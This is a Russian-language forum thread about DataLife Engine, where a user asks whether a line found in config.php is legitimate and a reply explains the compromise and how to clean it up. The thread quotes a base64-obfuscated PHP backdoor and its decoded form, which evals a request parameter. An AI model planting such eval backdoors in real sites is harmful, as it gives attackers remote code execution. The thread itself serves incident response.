Перейти к публикации

Это так и должно быть или это вставка?


Рекомендованные сообщения

Нашел у себя такой код в engine/data/config.php

'.@evalbase64_decodeDQppZihpc3NldCgkX1JFUVVFU1RbImRsZV9leGVjIl0pKXsNCglAZXZhbCgkX1JFUVVFU1RbImRsZV9leGVjIl0pOw0KCWV4aXQ7DQp9LyoqLw0K.//456' => 'qwe',

Что в переводе

if(isset($_REQUEST["dle_exec"])){

@eval($_REQUEST["dle_exec"]);

exit;

}/**/

Вопрос - что это и дожно такое быть?

Ссылка на сообщение
Поделиться на других сайтах

Эта строчка именно в этом виде как вы ее написали угрозы не представляет, потому как она уже экранирована скриптом, а появилась она потому что использовалась старая версия скрипта, на которую не ставились вовремя патчи безопасности http://dle-news.ru/bags/ во вторых к админпанели у вас имеют администраторский доступ посторонние лица, которые это сделали, потому как сделать это можно только будучи администратором на сайте. Удаляйте всех посторонних администраторов, на свой администраторский аккаунт меняйте пароль, ставьте все патчи безопасности или обновляйтесь до актуальной версии. Данную строчку удаляйте из файла.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...